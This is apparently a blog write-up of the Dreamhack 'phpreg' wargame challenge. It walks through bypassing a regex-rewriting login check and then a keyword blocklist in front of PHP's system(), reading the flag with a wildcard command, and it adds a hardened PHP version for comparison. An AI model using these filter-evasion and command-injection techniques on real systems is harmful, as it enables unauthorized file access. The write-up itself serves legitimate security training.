🔒 Cyber Security/Web Hacking

[Dreamhack] Dreamhack Web Hacking : phpreg

선달 2023. 11. 6. 16:50

https://dreamhack.io/wargame/challenges/873

 


 

 

Problem description

This page is written in PHP.

Entering the correct Nickname and Password takes you to Step 2.

In Step 2, use the system() function to obtain the flag.

The flag is located at ../dream/flag.txt.

The flag format is DH{…}.

 

Solution

          // POST request
          if ($_SERVER["REQUEST_METHOD"] == "POST") {
            $input_name = $_POST["input1"] ? $_POST["input1"] : "";
            $input_pw = $_POST["input2"] ? $_POST["input2"] : "";

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);
              
              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

                $cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

                if ($cmd === "") {
                  echo '
                        <p><form method="post" action="/step2.php">
                            <input type="hidden" name="input1" value="'.$input_name.'">
                            <input type="hidden" name="input2" value="'.$input_pw.'">
                            <input type="text" placeholder="Command" name="cmd">
                            <input type="submit" value="제출"><br/><br/>
                        </form></p>
                  ';
                }
                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }
              }
              else{
                echo "Wrong nickname or pw";
              }
            }
          }
          // GET request
          else{
            echo "Not GET request";
          }

index.php has nothing of note, so I only brought over the PHP part of the step2.php code.

 

Step 1

              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

The ID is dnyang0310 and the password is d4y0r50ng+1+13.

 

Password bypass

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }

 

๊ทผ๋ฐ ์–ด์ด์—†๊ฒŒ๋„ ๋น„๋ฐ€๋ฒˆํ˜ธ์— ์•ŒํŒŒ๋ฒณ์ด ์žˆ์œผ๋ฉด ์•ˆ๋˜๊ฒŒ ์ฒ˜๋ฆฌํ•ด๋†จ๋‹ค

 

              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);

 

On top of that, anything matching the regex \d*\@\d{2,3}(31)+[^0-8\"]\! is rewritten to the d4... prefix, so let's use that.

 

- \d* : zero or more digits

- \@ : the @ symbol

- \d{2,3} : 2 to 3 digits

- (31)+ : the digits 31, repeated one or more times

- [^0-8\"] : any single character (except the digits 0~8 and the " symbol)

- \! : the ! symbol

 

I roughly put together 0@12319! as a string that satisfies the regex,

so let's enter 0@12319!+1+13 as the password.

 

ID bypass

              $name = preg_replace("/nyang/i", "", $input_name);

It is set up so that the string nyang is removed wherever it appears.

That is, even if you enter the ID dnyang0310, it goes in as d0310.

So let's enter dnnyangyang0310, which becomes dnyang0310 after the removal (preg_replace makes a single pass and does not re-scan the result).

 

In the end

ID : dnnyangyang0310

Password : 0@12319!+1+13

 

Fun.

 

Step 2

Now you just need to enter a system command.

Like this, it works just like a command prompt.

The problem said the flag is located at ../dream/flag.txt,

so let's navigate there and read flag.txt.

 

cd ../dream; cat flag.txt

 

Ugh.

 

Something is wrong.

Let's look at the code once more.

                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }

 

flag๋ผ๋Š” ๋ฌธ์ž๊ฐ€ ๋“ค์–ด๊ฐ€์žˆ์œผ๋ฉด Error ๊ฐ€ ๋œจ๋„๋ก ์ฒ˜๋ฆฌํ•ด๋†จ๋‹ค

๊ทธ๋Ÿผ flag๋ผ๋Š” ๋‹จ์–ด๋ฅผ ์“ฐ์ง€ ์•Š๋Š” ๋ช…๋ น์–ด๋กœ ์ ‘๊ทผํ•ด๋ณด์ž

 

cd ../dream; cat ????.txt

 

Putting question marks in the cat argument makes the shell treat each ? as a wildcard for any single character, so it finds the matching file on its own and prints it.
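As an added example (not the challenge's code or the author's), here are the two checks from step2.php rebuilt in PHP 7.1+ with a hardened form beside each; COMMAND_MENU and the paths in it are made up for the demo.

```php
<?php
// Added example, not the challenge's own code: the two filters from
// step2.php rebuilt as functions, each next to a hardened form.

// Step 1 as written: the input is rewritten BEFORE it is compared, so any
// string that the rewrite collapses onto the secret is accepted.
function vulnerable_login(string $name, string $pw): bool {
    if (preg_match("/[a-zA-Z]/", $pw)) {
        return false;
    }
    // single pass: "dnnyangyang0310" becomes "dnyang0310" and is not re-scanned
    $name = preg_replace("/nyang/i", "", $name);
    // "0@12319!" matches the pattern and is replaced by the real prefix
    $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $pw);
    return $name === "dnyang0310" && $pw === "d4y0r50ng+1+13";
}

// Hardened: compare the raw input, in constant time, with no normalisation
// step in front of the comparison (a real app stores a password hash; the
// literal here mirrors the challenge).
function hardened_login(string $name, string $pw): bool {
    $nameOk = hash_equals("dnyang0310", $name);
    $pwOk = hash_equals("d4y0r50ng+1+13", $pw);
    return $nameOk && $pwOk;
}

// Step 2 as written: a substring blocklist in front of system(). The shell
// still expands wildcards, so "cat ????.txt" reaches flag.txt without the word.
function vulnerable_cmd_allowed(string $cmd): bool {
    return !preg_match("/flag/i", $cmd);
}

// The same matching the shell applies to "????.txt": one '?' per character.
function shell_would_match(string $pattern, string $file): bool {
    return fnmatch($pattern, $file);
}

// Hardened: a fixed menu of commands mapped to argv arrays (made-up entries);
// user text only selects a menu entry and is never handed to a shell.
const COMMAND_MENU = ['date' => ['/bin/date'], 'uptime' => ['/usr/bin/uptime']];
function hardened_cmd_argv(string $cmd): ?array {
    return COMMAND_MENU[$cmd] ?? null;   // unknown name: null, nothing runs
}

var_dump(vulnerable_login("dnnyangyang0310", "0@12319!+1+13"));
var_dump(hardened_login("dnnyangyang0310", "0@12319!+1+13"));
var_dump(vulnerable_cmd_allowed("cd ../dream; cat ????.txt"));
var_dump(shell_would_match("????.txt", "flag.txt"));
var_dump(hardened_cmd_argv("cat ????.txt"));
```

Run it with `php example.php`: the first, third and fourth dumps show the original checks accepting the bypass inputs, while the hardened forms reject them.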

 

Very fun.

Highly recommended for beginner hackers!!

๋ฐ˜์‘ํ˜•